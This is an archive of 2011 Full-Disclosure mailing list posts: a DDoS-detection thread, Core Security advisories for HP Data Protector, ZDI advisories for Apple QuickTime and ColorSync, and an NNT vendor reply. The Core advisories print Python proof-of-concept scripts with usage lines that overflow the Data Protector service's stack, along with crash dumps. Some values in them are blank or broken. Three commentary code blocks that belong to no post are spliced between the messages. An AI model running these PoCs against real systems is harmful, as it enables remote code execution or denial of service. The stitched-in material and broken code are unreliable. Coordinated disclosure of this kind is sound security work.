Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throughput)

2011-06-29 Thread coderman
2011/6/29 김무성 :
> You don't understand my question.
>
> I'm studying and researching a solution for DDoS detection through
> analysis of HTTP responses...


i implied that this is less useful on actual systems than in theory / lab.

if you want to gather useful details you need to instrument analysis
of HTTP requests/responses individually - just culling logs or
counting netflows won't cut it.

for example, measuring long requests at a front-end proxy (haproxy,
nginx, other) separate from measuring the application request/response
relayed to backend. measuring SSL session establishment, resumption
separate from HTTP requests within that session. measuring TCP
congestion control over which HTTP requests are sent. etc, etc...

the list of papers / sources covering large-scale network and
application performance tuning for the web is too large to list here.
good luck!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
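
The per-client check the original poster describes (one response repeated many times) computed over front-end proxy records that carry per-request timing, as coderman suggests, as an added example that is not part of either poster's message. The log lines are constructed for the example and follow the combined format with nginx's $request_time appended; the thresholds in flag_clients are illustrative assumptions, not values from the thread.

```python
import re
from collections import Counter, defaultdict

# Access-log line shape assumed here: combined format plus a trailing request
# duration in seconds (nginx's $request_time). Constructed for this example.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<rtime>\d+\.\d+)$'
)

def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = int(rec["bytes"])
    rec["rtime"] = float(rec["rtime"])
    return rec

def profile_clients(lines):
    """Aggregate per client: request count, status-code histogram, summed request time."""
    profiles = defaultdict(lambda: {"count": 0, "statuses": Counter(), "rtime": 0.0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue          # unparsable lines are skipped, not counted against anyone
        p = profiles[rec["client"]]
        p["count"] += 1
        p["statuses"][rec["status"]] += 1
        p["rtime"] += rec["rtime"]
    return profiles

def flag_clients(lines, min_requests=20, same_status_ratio=0.9, slow_seconds=1.0):
    """Clients that sent at least min_requests and drew almost only one response
    code, or whose requests were slow on average. Returns {client: [reasons]}.
    Thresholds are illustrative assumptions; tune them against your own baseline."""
    findings = {}
    for client, p in profile_clients(lines).items():
        if p["count"] < min_requests:
            continue
        reasons = []
        status, n = p["statuses"].most_common(1)[0]
        if n / p["count"] >= same_status_ratio:
            reasons.append("%d of %d responses were HTTP %d" % (n, p["count"], status))
        mean = p["rtime"] / p["count"]
        if mean >= slow_seconds:
            reasons.append("mean request time %.3fs" % mean)
        if reasons:
            findings[client] = reasons
    return findings

def make_sample():
    """Constructed sample: a few ordinary clients plus one source hammering a slow endpoint."""
    normal = [
        '10.0.0.1 - - [29/Jun/2011:12:30:01 +0000] "GET /index.html HTTP/1.1" 200 5120 0.012',
        '10.0.0.1 - - [29/Jun/2011:12:30:02 +0000] "GET /css/site.css HTTP/1.1" 200 2048 0.004',
        '10.0.0.2 - - [29/Jun/2011:12:30:02 +0000] "POST /login HTTP/1.1" 302 0 0.045',
        '10.0.0.2 - - [29/Jun/2011:12:30:03 +0000] "GET /account HTTP/1.1" 200 7300 0.061',
        '10.0.0.3 - - [29/Jun/2011:12:30:03 +0000] "GET /missing HTTP/1.1" 404 169 0.002',
    ]
    flood = [
        '198.51.100.7 - - [29/Jun/2011:12:30:%02d +0000] "GET /search?q=%d HTTP/1.1" 503 0 3.002'
        % (i % 60, i)
        for i in range(40)
    ]
    return normal + flood

if __name__ == "__main__":
    for client, reasons in sorted(flag_clients(make_sample()).items()):
        print(client, "; ".join(reasons))
```

The same-status check on its own is weak: a busy legitimate client also draws almost nothing but 200s, so it only becomes useful when paired with the status class, the per-request timing, and ideally the separate frontend and backend measurements coderman describes. Aggregating by source IP alone also misfires behind NAT or a CDN; a session or user-agent dimension is usually needed as well.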

Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throughput)

2011-06-29 Thread 김무성
You don't understand my question.

I'm studying and researching a solution for DDoS detection through
analysis of HTTP responses.

For example,
If only one response is detected several times, this is abnormal.

-Original Message-
From: coderman [mailto:coder...@gmail.com] 
Sent: Wednesday, June 29, 2011 12:30 PM
To: 김무성
Cc: full-disclosure@lists.grok.org.uk; pen-t...@securityfocus.com
Subject: Re: [Full-disclosure] how to detect DDoS attack through HTTP
response analysis(throughput)

2011/6/26 김무성 :
> ...
> I'm looking for materials or information, research about how to
> detect DDoS attack through HTTP response analysis(throughput).

you're asking the wrong question.

instead of asking "How can I automagically detect exploitation of my
shitty app via HTTP Resp. codes"

ask: "Why is my webapp so shitty that any number of arbitrary requests
lead to resource exhaustion?"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CORE-2011-0606: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability

2011-06-29 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - Corelabs Advisory
   http://corelabs.coresecurity.com/

  HP Data Protector EXEC_CMD Buffer Overflow Vulnerability


1. *Advisory Information*

Title: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability
Advisory ID: CORE-2011-0606
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Remote stack overflow [CWE-120]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1866


3. *Vulnerability Description*

HP Data Protector [1] is automated backup and recovery software for
single-server to enterprise environments. A vulnerability in HP Data
Protector could allow a remote attacker to execute arbitrary code. The
vulnerability is triggered by sending a request to port  of a host
running the "data protector inet" service, part of HP Data Protector.


4. *Vulnerable packages*

   . HP OpenView Storage Data Protector v6.20 (running on Windows).
   . HP OpenView Storage Data Protector v6.11 (running on Windows).
   . HP OpenView Storage Data Protector v6.10 (running on Windows).
   . HP OpenView Storage Data Protector v6.00 (running on Windows).
   . Previous versions may be affected, but were not tested.


5. *Non-vulnerable packages*

   . No fixes are available at the time of publication.


6. *Vendor Information, Solutions and Workarounds*

HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.

The latest version of HP Data Protector is vulnerable to this issue. HP
has provided the following procedure to mitigate this vulnerability:

   1. Upgrade to Data Protector A.06.20 or subsequent.
   2. Enable encrypted control communication services on cell server and
all clients in cell.

 The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.


7. *Credits*

This vulnerability was discovered and researched by Nahuel C. Riva from
Core Security Technologies. Publication was coordinated by Carlos Sarraute.


8. *Technical Description / Proof of Concept Code*

The following python script can be used to reproduce the bug.

/-
import sys
import socket

from struct import pack

ip = sys.argv[1]
port = int(sys.argv[2]) # default tcp port 

target = (ip, port)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)

path = 'A' * 5000

packet =  pack('H', 0x0020)
packet += pack('H', 0x0020)
packet += pack('>H', 0x0020) * 4
packet += pack('H', 0x0020)
packet += path
packet += pack('>H', 0x)

plen = pack('>L', len(packet))

s.send(plen + packet)

- -/
By executing this script, the omniinet.exe process crashes at the
following EIP:

/-
7C8285D38B0424   MOV EAX,DWORD PTR SS:[ESP]
7C8285D68BE5 MOV ESP,EBP
7C8285D85D   POP EBP
7C8285D9C3   RETN

- -/
This is part of a function inside ntdll.dll; however, if we look at
the SEH chain, we can see that the SEH handler was overwritten with
the value 0x00410041 (the Unicode encoding of "AA"):

/-
SEH chain of thread 0578
AddressSE handler
009AFF94   omniinet.00410041
00410041   A3004472

- -/
 The following are the values of the CPU registers at the time of the
crash:

/-
EAX C008
ECX 009AEC98
EDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher
EBX 0015B480
ESP 009AEC44
EBP 009AEC94
ESI 00155A80
EDI 
EIP 7C8285D3 ntdll.7C8285D3
C 0  ES 0023 32bit 0()
P 1  CS 001B 32bit 0()
A 0  SS 0023 32bit 0()
Z 0  DS 0023 32bit 0()
S 0  FS 003B 32bit 7FFDB000(FFF)
T 0  GS  NULL
D 0
O 0  LastErr ERROR_SUCCESS ()
EFL 0206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.7610098
ST7 empty 1.000
   3 2 1 0  E S P U O Z D I
FST 4020  Cond 1 0 0 0  Err 0 0 1 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask1 1 1 1 1 1

- -/
The problem is in the function at 0041D170, which blindly copies the
string passed in the packet as a path:

/-
0041D170 /$ 55 PUSH EBP
0041D171 |. 8BEC   MOV EBP,ESP
0041D173 |. 51 PUSH ECX
0041D174 |. 8B45 08MOV EAX,DWORD PTR SS:[EBP+8]
0041D177 |. 8945 FCMOV DWORD PTR SS:[EBP-4],EAX
0041D17A |. 8B4D 08MOV ECX,DWORD PTR SS:[EBP+8]
0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]
0041D180 |. 85D2   TEST EDX,EDX
0041D182 |. 74 73  JE SHORT omniinet.0041D1F7
[...]
0041D1F7 |> 8B45 0C/MOV EAX,DWORD PTR SS:[EBP+C]
0041D1FA |. 0FB708 |MOVZX ECX,

[Full-disclosure] CORE-2011-0514: Multiple vulnerabilities in HP Data Protector

2011-06-29 Thread CORE Security Technologies Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  Core Security Technologies - Corelabs Advisory
   http://corelabs.coresecurity.com/

  Multiple vulnerabilities in HP Data Protector


1. *Advisory Information*

Title: Multiple vulnerabilities in HP Data Protector
Advisory ID: CORE-2011-0514
Advisory URL:
http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
Date published: 2011-06-29
Date of last update: 2011-06-29
Vendors contacted: HP
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Remote stack overflow [CWE-120], Null pointer dereference
[CWE-476], Improper input validation [CWE-20]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515


3. *Vulnerability Description*

HP Data Protector [1] is automated backup and recovery software for
single-server to enterprise environments. Multiple vulnerabilities have
been found in HP Data Protector that could allow a remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered by sending a request to port  of a
host running the "data protector inet" service, part of HP Data
Protector. The request has several parameters, including an opcode. By
sending requests with specially crafted parameters, the different bugs
can be triggered.


4. *Vulnerable packages*

   . HP OpenView Storage Data Protector v6.20 (running on Windows).
   . HP OpenView Storage Data Protector v6.11 (running on Windows).
   . HP OpenView Storage Data Protector v6.10 (running on Windows).
   . HP OpenView Storage Data Protector v6.00 (running on Windows).
   . Previous versions may be affected, but were not tested.


5. *Non-vulnerable packages*

   . No fixes are available at the time of publication.


6. *Vendor Information, Solutions and Workarounds*

HP has issued a security bulletin with document ID c02872182 [2]
available through HP Support Center at http://www.hp.com/go/HPSC.

The latest version of HP Data Protector is vulnerable to these issues.
HP has provided the following procedure to mitigate these vulnerabilities:

   1. Upgrade to Data Protector A.06.20 or subsequent.
   2. Enable encrypted control communication services on cell server and
all clients in cell.

 The upgrade is available for download from
http://hp.com/go/dataprotector then under 'Product Information' click on
'Trials and Demos'.


7. *Credits*

These vulnerabilities were discovered by Oren Isacson from Core Security
Technologies. Publication was coordinated by Carlos Sarraute.


8. *Technical Description / Proof of Concept Code*

The following python script can be used to reproduce the different bugs.

/-
import struct, socket, sys

target= sys.argv[1]
opcode= sys.argv[2]
string_lenght = int(sys.argv[3])
args_number   = int(sys.argv[4])
long_argument = int(sys.argv[5])

def to_wc(x):
return ''.join(["%s\x00" % c for c in x] )

args = [to_wc('a')] * args_number
args[5] = to_wc(opcode)
args[long_argument] = 'a' * string_lenght
packet = ["\xff\xfe\x32\x00\x00\x00"]

for s in args:
packet.append("\x20\x00" + s + "\x00\x00")

packet = ''.join(packet)
packet = struct.pack(">L", len(packet)) + packet

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target, ))
sock.send(packet)

- -/


In the following sections, we give the command line details to reproduce
each bug, and a brief description of the effect produced.


8.1. *Vulnerability 1. Opcodes 20 and 28.*

[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
 "poc.py 127.0.0.1 20 1 30 13" or "poc.py 127.0.0.1 28 1 30 6"
 This causes a stack overflow.

/-
007ce194 00426c52 007d 00810b48 007ce266 omniinet+0x26bf3
007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52
007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35
61616161     0x61616161

- -/



8.2. *Vulnerability 2. Opcode 11.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 11 1 30 17"
 A stack overflow is produced within the function swprintf, called from
position 0x00411A72.


8.3. *Vulnerability 3. Opcode 35.*

[CVE-2011-1865] This vulnerability can be reproduced with any of the
following commands:
 "poc.py 127.0.0.1 35 1 30 6" or "poc.py 127.0.0.1 35 1 30 7"
 A stack overflow is produced within the function swprintf, called from
position 0041367F.


8.4. *Vulnerability 4. Opcode 42.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 42 1 30 9"
 A stack overflow is produced by calling the function swprintf from
position 0x0040A9BA.


8.5. *Vulnerability 5. Opcode 46.*

[CVE-2011-1865] This vulnerability is reproduced with the following command:
 "poc.py 127.0.0.1 46 1 30 17"
 A stack overflow is produced by calling the function swprintf from
positio
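
An added, defensive example that is not part of either Core advisory or of their PoC scripts: a parser for the request framing as the CORE-2011-0514 script above constructs it (big-endian 32-bit body length, the fixed leading bytes, then each argument as a UTF-16LE space, the argument bytes, and a UTF-16LE NUL, with the opcode in argument 5). That the service really interprets the bytes this way is an assumption drawn only from the PoC, and MAX_ARG_BYTES is a hypothetical limit: the real field sizes are not on the page. The parser reports frames whose arguments are oversized or malformed, which is how the overlong strings used against the inet service in both CORE-2011-0606 and CORE-2011-0514 could be caught by a monitor in front of the service.

```python
import struct

# Framing as constructed by the CORE-2011-0514 PoC script (assumption: this is
# the on-the-wire layout the service expects; nothing beyond the PoC is known).
MAGIC = b"\xff\xfe\x32\x00\x00\x00"   # fixed prefix the PoC emits
SEP = b"\x20\x00"                      # UTF-16LE space preceding every argument
TERM = b"\x00\x00"                     # UTF-16LE NUL closing every argument
OPCODE_INDEX = 5                       # the PoC places the opcode in args[5]
MAX_ARG_BYTES = 256                    # hypothetical limit; real buffer sizes are not on the page

def to_wc(s):
    """UTF-16LE encode an ASCII string, as the PoC's to_wc() does."""
    return s.encode("utf-16-le")

def build_request(args):
    """Frame a request the way the PoC does: BE u32 body length, MAGIC, then SEP+arg+TERM per arg."""
    body = MAGIC + b"".join(SEP + a + TERM for a in args)
    return struct.pack(">L", len(body)) + body

def _find_term(buf):
    """Offset of the first even-aligned 00 00 (a UTF-16LE NUL) in buf, or -1."""
    for i in range(0, len(buf) - 1, 2):
        if buf[i:i + 2] == TERM:
            return i
    return -1

def parse_request(data, max_arg_bytes=MAX_ARG_BYTES):
    """Parse one framed request.

    Returns (opcode, args, problems): args are the raw argument byte strings and
    problems is a list of findings (empty for a well-formed, size-conforming
    request). Oversized or malformed arguments are reported rather than silently
    dropped so a monitor can log exactly what was wrong.
    """
    problems = []
    if len(data) < 4 + len(MAGIC):
        return None, [], ["frame too short (%d bytes)" % len(data)]
    (declared,) = struct.unpack(">L", data[:4])
    body = data[4:]
    if declared != len(body):
        problems.append("length field %d does not match body length %d" % (declared, len(body)))
    if not body.startswith(MAGIC):
        problems.append("unexpected header %r" % body[:len(MAGIC)])
    rest = body[len(MAGIC):]
    args = []
    while rest:
        if not rest.startswith(SEP):
            problems.append("argument %d is not preceded by a separator" % len(args))
            break
        rest = rest[len(SEP):]
        end = _find_term(rest)
        if end < 0:
            problems.append("argument %d is unterminated" % len(args))
            break
        arg = rest[:end]
        if len(arg) > max_arg_bytes:
            problems.append("argument %d is %d bytes (limit %d)" % (len(args), len(arg), max_arg_bytes))
        args.append(arg)
        rest = rest[end + len(TERM):]
    opcode = None
    if len(args) > OPCODE_INDEX:
        opcode = args[OPCODE_INDEX].decode("utf-16-le", errors="replace")
    return opcode, args, problems

def is_suspicious(data, max_arg_bytes=MAX_ARG_BYTES):
    """True when a frame is worth alerting on under the assumed limits."""
    return bool(parse_request(data, max_arg_bytes)[2])

if __name__ == "__main__":
    # Constructed samples: 30 short arguments with opcode "20" in slot 5, and the
    # same request with argument 13 replaced by 2000 raw bytes, the PoC's shape.
    benign = [to_wc("a")] * 30
    benign[OPCODE_INDEX] = to_wc("20")
    hostile = list(benign)
    hostile[13] = b"a" * 2000
    for name, req in (("benign", build_request(benign)), ("hostile", build_request(hostile))):
        opcode, args, problems = parse_request(req)
        print(name, "opcode", opcode, "args", len(args), "problems", problems)
```

The terminator scan only looks at even offsets, so an argument of odd raw length (as the PoC produces when string_lenght is odd) will not line up with the UTF-16 grid and is reported as unterminated rather than decoded; that is the desired outcome for a monitor, since the service's own handling of such input is exactly what the advisory shows to be unsafe.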

[Full-disclosure] ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution Vulnerability

2011-06-29 Thread ZDI Disclosures
ZDI-11-229: Apple QuickTime RIFF fmt Chunk Parsing Remote Code Execution 
Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-229

June 29, 2011

-- CVE ID:
CVE-2011-0209

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11430. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within how the application parses a specially
formatted RIFF WAV file. When parsing a fmt chunk within the file, the
application uses a 32-bit field to calculate the size of a buffer to
allocate. Before the allocation, the application adds 0x14 bytes to the
result. Due to restrictions imposed on the implementation of this
component by the language and its platform, an integer overflow can be
made to occur. This can lead to code execution under the context of the
application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4723

-- Disclosure Timeline:
2011-04-11 - Vulnerability reported to vendor
2011-06-29 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Luigi Auriemma

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution Vulnerability

2011-06-29 Thread ZDI Disclosures
ZDI-11-228: Apple ColorSync ICC Profile ncl2 Parsing Remote Code Execution 
Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-228

June 29, 2011

-- CVE ID:
CVE-2011-0200

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Mail
Apple OS X
Apple Safari

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11426. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Safari on Windows and multiple
applications on OSX. User interaction is required to exploit this
vulnerability in that the target must visit a malicious page or open a
malicious file.

The flaw exists within the ColorSync component which is used when
handling image files containing embedded ICC data. When handling the
ncl2 tag the process miscalculates an integer value used in a memory
allocation. This buffer is later used as a destination when copying user
controlled data. A remote attacker can exploit this vulnerability to
execute arbitrary code under the context of the user running the
application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4723

-- Disclosure Timeline:
2011-04-04 - Vulnerability reported to vendor
2011-06-29 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* binaryproof

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code Execution Vulnerability

2011-06-29 Thread ZDI Disclosures
ZDI-11-230: Apple Quicktime Apple Lossless Audio Codec Parsing Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-230

June 29, 2011

-- CVE ID:
CVE-2011-0211

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11428. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Quicktime handles Apple Lossless
Audio Codec streams. While parsing the sample description for the 'alac'
codec an integer wrap can occur that results in the allocation of a
memory buffer that is smaller than intended. When Quicktime writes to
this buffer it causes a memory corruption that can lead to remote code
execution under the context of the current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4723

-- Disclosure Timeline:
2011-04-11 - Vulnerability reported to vendor
2011-06-29 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Luigi Auriemma
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
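
The allocation-size arithmetic ZDI-11-229 above describes (a 32-bit size taken from the fmt chunk plus 0x14), which is the same class of wrap that ZDI-11-228 and ZDI-11-230 report for the ncl2 tag and the alac sample description, as an added example that is neither ZDI's nor Apple's code. It assumes the 32-bit field in question is the chunk's own size field, which the advisory does not state, and constructs its own WAV bytes; check_fmt_chunk shows the two checks a parser needs before trusting that field, and buffer_size_32bit shows what the unchecked arithmetic produces.

```python
import struct

U32_MAX = 0xFFFFFFFF
FMT_SLACK = 0x14   # the advisory says 0x14 bytes are added to the computed size before allocation

def build_wav(fmt_size, fmt_payload=b""):
    """Constructed minimal RIFF/WAVE holding one fmt chunk whose size field we control.
    The size field may deliberately disagree with the payload actually present."""
    chunk = b"fmt " + struct.pack("<I", fmt_size) + fmt_payload
    body = b"WAVE" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body

def iter_chunks(data):
    """Yield (fourcc, declared_size, payload_offset) for each chunk header in a RIFF/WAVE file."""
    if data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        yield fourcc, size, pos + 8
        pos += 8 + size + (size & 1)   # chunk payloads are padded to an even length

def buffer_size_32bit(declared):
    """Size a 32-bit computation of declared + 0x14 produces, wrapping as the bug does."""
    return (declared + FMT_SLACK) & U32_MAX

def check_fmt_chunk(data):
    """Validate the fmt chunk the way a hardened parser should: declared + 0x14 must not
    wrap, and the declared size must fit inside the file. Returns (ok, reason)."""
    for fourcc, size, off in iter_chunks(data):
        if fourcc != b"fmt ":
            continue
        if size > U32_MAX - FMT_SLACK:
            return False, "fmt size 0x%x + 0x%x wraps to 0x%x" % (size, FMT_SLACK, buffer_size_32bit(size))
        if off + size > len(data):
            return False, "fmt size %d exceeds file (%d bytes remain)" % (size, len(data) - off)
        return True, "fmt chunk of %d bytes, buffer %d" % (size, size + FMT_SLACK)
    return False, "no fmt chunk"

if __name__ == "__main__":
    # Constructed 16-byte PCM fmt payload: format 1, 2 channels, 44100 Hz, 176400 B/s, align 4, 16 bits.
    good = build_wav(16, b"\x01\x00\x02\x00\x44\xac\x00\x00\x10\xb1\x02\x00\x04\x00\x10\x00")
    print(check_fmt_chunk(good))
    print(check_fmt_chunk(build_wav(0xFFFFFFF0)))   # 0xFFFFFFF0 + 0x14 wraps to a 4-byte buffer
    print(check_fmt_chunk(build_wav(0x1000)))       # claims more payload than the file holds
```

The order of the checks matters: testing the wrap first means the file-bounds comparison is done on a value that is already known not to have wrapped, so a size chosen to pass the second check through overflow cannot slip past the first.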


Re: [Full-disclosure] Resolved - NNT Change Tracker - Hard-Coded Encryption Key - Originally posted as http://seclists.org/fulldisclosure/2011/May/460

2011-06-29 Thread Dennis Brunnen
As is probably obvious to other readers, I did indeed notify NNT by
email of the vulnerability before making it public - as mentioned in
my initial disclosure. I'm not sure what possible reason anyone would
have to say that if it were not true.

Glad to see you apparently did the right thing and eventually fixed it though.

On Wed, Jun 29, 2011 at 3:34 PM, NNT Support  wrote:
> Background
> -
>
> The product employs a portion of legacy code as referenced in the original
> post. This is used for the product key and some database entries but whilst
> the strength of the encryption being used here may be a problem for the NNT
> licensing team, there is no genuine security risk for device data. This
> portion of code has subsequently been replaced in Versions 5 and patches are
> available from www.nntws.com
>
> Change Tracker works on the principle of layered, multi-dimensional security
> in line with the PCI DSS that it is commonly used to underpin. The secure
> commissioning process should include standard lockdown and
> access-restriction procedures for the Change Tracker server and database
> server used for device and configuration data storage. Access security
> should also be complemented with monitoring using a SIEM solution such as
> NNT Log Tracker, so any access to the Change Tracker server, the Change
> Tracker console program or the database will be logged and alerted as
> unusual activity.
>
> NNT take security of our customer systems extremely seriously. Anyone with
> any concerns regarding best practice in Production System security should
> contact us for further assistance.
>
> Regarding any vulnerabilities discovered by independent security researchers
> in the future, we would prefer these are reported to us at supp...@nntws.com
> before being published. This was not the case in this instance, delaying our
> opportunity to respond. Thank you.
>
> Company Homepage
> --
>
> http://www.newnettechnologies.com
>
>
>
> Regards
>
> NNT Support
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution Vulnerability

2011-06-29 Thread ZDI Disclosures
ZDI-11-231: Apple QuickTime Pict File Matrix Parsing Remote Code Execution 
Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-231

June 29, 2011

-- CVE ID:
CVE-2010-3790

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

